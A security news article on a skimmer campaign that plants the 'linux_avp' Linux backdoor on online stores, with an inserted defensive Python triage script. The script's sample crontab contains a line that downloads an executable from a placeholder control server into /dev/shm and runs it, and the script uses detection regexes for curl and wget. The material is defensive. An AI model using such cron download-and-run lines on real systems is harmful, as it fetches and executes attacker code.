With skimmer software, hackers use a Linux backdoor on compromised e-commerce sites


Sansec Threat Research Team has found a new malicious agent called “linux avp” that disguises itself as a system process on e-commerce systems. According to them, hackers have been spreading this malware around the world since last week, and it receives commands from a Beijing-based control server.

Security researchers have discovered a new hacking campaign that installs a Linux backdoor on compromised e-commerce sites after deploying a credit card skimmer on merchant websites.

Highlights

  • “After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a webshell and modified the server code to intercept customer data,” said researchers.

  • In the campaign, hackers started automated e-commerce attack probes, testing for dozens of weaknesses in common online store platforms.

“Analysis of linux_avp suggests that it serves as a backdoor, waiting for commands from a Beijing (Alibaba) hosted server,” said researchers. The backdoor also revealed that a user known as “dob” built it in a project folder named lin_avp, using the code name GREECE.

Researchers said hackers then uploaded the linux_avp malware, a Golang program that, once started, removes itself from disk and disguises itself as a fake ps -ef process.

The malware also injects a malicious crontab entry to ensure access in case the process is removed or the server is rebooted. The crontab downloads the Golang malware executable to a random writable directory and installs two configuration files. “One contains a public key, which is presumably used to ensure that no one but the malware owner can launch commands,” researchers added.
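A defender-side triage script for the two behaviours just described (a process posing as ps -ef whose binary has been unlinked from disk, and a cron job that re-downloads an executable into a scratch directory), added here as an example and not code from Sansec or the article; the regexes, the directory list and the sample crontab are constructed assumptions.

```python
import os
import re

# Assumed heuristics, not Sansec's logic. Package upgrades also leave "(deleted)"
# binaries running, so treat a hit as a lead to triage, not a verdict.
PS_LIKE = re.compile(r"^(?:/usr)?/bin/ps\b|^ps\b")
DOWNLOAD = re.compile(r"\b(?:curl|wget)\b")
SCRATCH_DIR = re.compile(r"/(?:tmp|var/tmp|dev/shm)/")

# Constructed sample crontab; the URL is a placeholder, not a real indicator.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 * * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * wget -q http://C2-PLACEHOLDER/x -O /dev/shm/.x && chmod +x /dev/shm/.x && /dev/shm/.x
"""

def classify_process(cmdline: str, exe_target: str) -> list[str]:
    """Reasons a (cmdline, readlink('/proc/PID/exe')) pair looks like the masquerading backdoor."""
    reasons = []
    if exe_target.endswith(" (deleted)"):
        reasons.append("binary deleted from disk while still running")
    if PS_LIKE.match(cmdline) and not exe_target.replace(" (deleted)", "").endswith("/ps"):
        reasons.append("claims to be ps but exe is " + exe_target)
    return reasons

def suspicious_cron_lines(crontab: str) -> list[tuple[int, str]]:
    """Flag non-comment cron entries that download into /tmp, /var/tmp or /dev/shm."""
    hits = []
    for n, line in enumerate(crontab.splitlines(), 1):
        s = line.strip()
        if s and not s.startswith("#") and DOWNLOAD.search(s) and SCRATCH_DIR.search(s):
            hits.append((n, s))
    return hits

def scan_proc(proc_root: str = "/proc") -> list[tuple[int, list[str]]]:
    """Apply classify_process to every live PID; root is needed to read other users' exe links."""
    findings = []
    for entry in filter(str.isdigit, os.listdir(proc_root) if os.path.isdir(proc_root) else []):
        try:
            with open(os.path.join(proc_root, entry, "cmdline"), "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            exe = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel thread, PID already gone, or no permission
        reasons = classify_process(cmdline, exe)
        if reasons:
            findings.append((int(entry), reasons))
    return findings

if __name__ == "__main__":
    for pid, reasons in scan_proc():
        print(pid, "; ".join(reasons))
```

Run it as root on the suspect host and review the system crontab and each user's crontab with suspicious_cron_lines in the same way.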

This case has another Chinese connection, according to researchers: a line was added to the e-commerce platform code that calls a file named app/design/frontend/favicon_absolute_top.jpg, which contains PHP code to retrieve a fake payment form and inject it into the store. Researchers said the IP serving this was hosted in Hong Kong and had previously been observed as a skimming exfiltration endpoint in July and August of this year.

Researchers said that, at the time of writing, no other antivirus vendor had recognized the malware. “Curiously, one individual had submitted the same malware to VirusTotal on Oct 8th with the comment ‘test’. This was just one day after the successful breach of our customer’s store,” said researchers.

They added that the person who uploaded the malware could very well be its author, wanting to confirm that common antivirus engines would not detect their creation.